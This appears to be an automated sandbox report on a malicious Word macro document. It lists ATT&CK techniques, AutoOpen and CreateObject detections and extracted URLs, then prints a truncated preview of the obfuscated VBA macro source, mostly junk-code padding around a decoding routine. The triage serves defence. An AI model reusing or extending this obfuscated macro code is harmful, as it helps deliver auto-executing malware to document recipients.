Verdict: MALICIOUS
Risk Score: 224
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it attempts to execute automatically upon opening. Heuristics suggest obfuscated code and the use of CreateObject, commonly employed to download and execute further stages. The presence of a suspicious URL warrants further investigation.
Heuristics (8)
- ClamAV: Doc.Macro.Obfuscated-6397052-2 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.isprambiente.gov.it/files/temi/rischio-industriale/stabilimenti.jpg In document text (OLE body)
  - http://ns.adobe.com/xap/1.0/ In document text (OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ In document text (OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# In document text (OLE body)
  - http://ns.adobe.com/photoshop/1.0/ In document text (OLE body)
  - http://purl.org/dc/elements/1.1/ In document text (OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 174215 bytes |

SHA-256: 93afe79c5c842642a9e14046788e4c84a07aa85ca69f495a7b11426b16174be2
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 2 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AZ44wa"
Public Function QVhfFJCkPDZ2Sop0(Pk7TunAk5FSv6M1 As String, Optional af62E5RKszZrcP As Boolean = True) As String
Static tUkrEWdMUbSnPUk(0 To 255) As Byte
Dim GCEBm0k2NFZkEL As Integer
Dim ampEGYOZmqU6k91R() As Byte, iBKhek7leyen2b() As Byte
Dim zMTehrzumBIxfm As String
zMTehrzumBIxfm = Application.UserName
Dim HWH6SNtM4VM, G9OlSZcSwS7R8L As Integer
G9OlSZcSwS7R8L = Len(zMTehrzumBIxfm)
Dim df30Kli0nRl As Collection
While G9OlSZcSwS7R8L > 5
HWH6SNtM4VM = HWH6SNtM4VM + 3
G9OlSZcSwS7R8L = G9OlSZcSwS7R8L - 1
Wend
Dim v4cZk82UhU5IVr As Collection
Set v4cZk82UhU5IVr = New Collection
v4cZk82UhU5IVr.Add "df30Kli0nRl"
v4cZk82UhU5IVr.Add "BLy7gJpHJyS"
v4cZk82UhU5IVr.Add "dhwMXRX4ljTIYV"
Dim bu3qyAT3GckgxO As Integer
Dim hVtDSUpsS9Zuul, n1L85AhExlS As String
hVtDSUpsS9Zuul = 6
n1L85AhExlS = 5
#If hVtDSUpsS9Zuul > n1L85AhExlS Then
Dim gtqz9oOIrYv As LongPtr
#Else
Dim gtqz9oOIrYv As Integer
gtqz9oOIrYv = 6 + 5
Dim taGow089MeQ As Integer
For taGow089MeQ = 0 To hVtDSUpsS9Zuul
taGow089MeQ = taGow089MeQ + 1
Next taGow089MeQ
#End If
Dim RLlDN98v2ROrG0, VzWELFMYx0A As String
RLlDN98v2ROrG0 = 6
VzWELFMYx0A = 7
#If RLlDN98v2ROrG0 > VzWELFMYx0A Then
Dim qQupbDz6ooB As LongPtr
#Else
Dim qQupbDz6ooB As Integer
qQupbDz6ooB = 6 + 7
Dim uNaftBXHE9c As Integer
For uNaftBXHE9c = 0 To RLlDN98v2ROrG0
uNaftBXHE9c = uNaftBXHE9c + 1
Next uNaftBXHE9c
#End If
Dim SlBrHgAGhspIKC As Integer
For J2Ge64n9ABH = 2 To 24
SlBrHgAGhspIKC = J2Ge64n9ABH
Next J2Ge64n9ABH
Dim AuPVkiG2Gcn9FBt As Long, VuNcJolDzF4wDkR4kg As Long
Dim ndVnryEWueX0Sh, l4LeJqX5GuW As Integer
ndVnryEWueX0Sh = 3
l4LeJqX5GuW = 4
#If lty7h8Q805T <> 0 Then
lty7h8Q805T = lty7h8Q805T + 2
Dim Yma5dcgcPgV As Variant
Else
Dim Yma5dcgcPgV As Object
#End If
If ndVnryEWueX0Sh > l4LeJqX5GuW Then
For VZDNs0SFxWkQ7E = l4LeJqX5GuW To ndVnryEWueX0Sh
l4LeJqX5GuW = l4LeJqX5GuW / ndVnryEWueX0Sh
Next VZDNs0SFxWkQ7E
End If
If tUkrEWdMUbSnPUk(0) = 0 Then
Dim jvF61Vc0NDU6Io As Object
Dim QSMAmwx3SOCh4G, VUOIS5d7tA0 As Integer
QSMAmwx3SOCh4G = 8
VUOIS5d7tA0 = 3
#If ezBn99ETDwj <> 0 Then
ezBn99ETDwj = ezBn99ETDwj + 3
Dim Bzq7dtCY8Xw As Variant
Else
Dim Bzq7dtCY8Xw As Object
#End If
If QSMAmwx3SOCh4G > VUOIS5d7tA0 Then
For KxeAERoCWiMKB8 = VUOIS5d7tA0 To QSMAmwx3SOCh4G
VUOIS5d7tA0 = VUOIS5d7tA0 / QSMAmwx3SOCh4G
Next KxeAERoCWiMKB8
End If
For AuPVkiG2Gcn9FBt = 0 To 255
Dim dx3yezzVvQLJAS As String
Dim KUbUPzAoMatPyr As Integer
Dim rcsAVMiM4a0 As String
KUbUPzAoMatPyr = 7382
Dim eEQXUTRTi1x As Integer
rcsAVMiM4a0 = Right(CStr(KUbUPzAoMatPyr), 1)
eEQXUTRTi1x = CInt(rcsAVMiM4a0)
For TkNDvdTWQbs = eEQXUTRTi1x To 38
KUbUPzAoMatPyr = KUbUPzAoMatPyr + 9
Next TkNDvdTWQbs
Dim pSaE3iJY22s8yw As String
Dim YVr2aXGiUBM As String
YVr2aXGiUBM = XOxfcVhSXtf
pSaE3iJY22s8yw = bwG10Fw1BSD
If (StrComp(pSaE3iJY22s8yw, YVr2aXGiUBM, vbTextCompare) <> 0) Then
MsgBox ("Optional: R7ki7ksBO7Y2bT.")
End If
Dim ykWeiI4oifMWU0 As Integer
Dim glRAwmLBL9c As String
ykWeiI4oifMWU0 = 9621
Dim ZY7DZd8fHNF As Integer
glRAwmLBL9c = Right(CStr(ykWeiI4oifMWU0), 1)
ZY7DZd8fHNF = CInt(glRAwmLBL9c)
For EiZqBHAByZI = ZY7DZd8fHNF To 26
ykWeiI4oifMWU0 = ykWeiI4oifMWU0 + 8
Next EiZqBHAByZI
Dim S6Eg28li5gvP1R, BpJ5OL9rfRU As Integer
S6Eg28li5gvP1R = 3
BpJ5OL9rfRU = 9
#If RbWnSW0zNNJ <> 0 Then
RbWnSW0zNNJ = RbWnSW0zNNJ + 6
Dim bgILjear3B5 As Variant
Else
Dim bgILjear3B5 As Object
#End If
If S6Eg28li5gvP1R > BpJ5OL9rfRU Then
For QyhvVbhgpazMhh = BpJ5OL9rfRU To S6Eg28li5gvP1R
BpJ5OL9rfRU = BpJ5OL9rfRU / S6Eg28li5gvP1R
Next QyhvVbhgpazMhh
End If
tUkrEWdMUbSnPUk(AuPVkiG2Gcn9FBt) = 255
Dim ewg8iRQ6ZIiY5C As Object
Dim sSTCF1uMmJx45X, oDxqiHBqfSz As Integer
sSTCF1uMmJx45X = 4
oDxqiHBqfSz = 6
#If ORZmkl7r6fC <> 0 Then
ORZmkl7r6fC = ORZmkl7
... (truncated)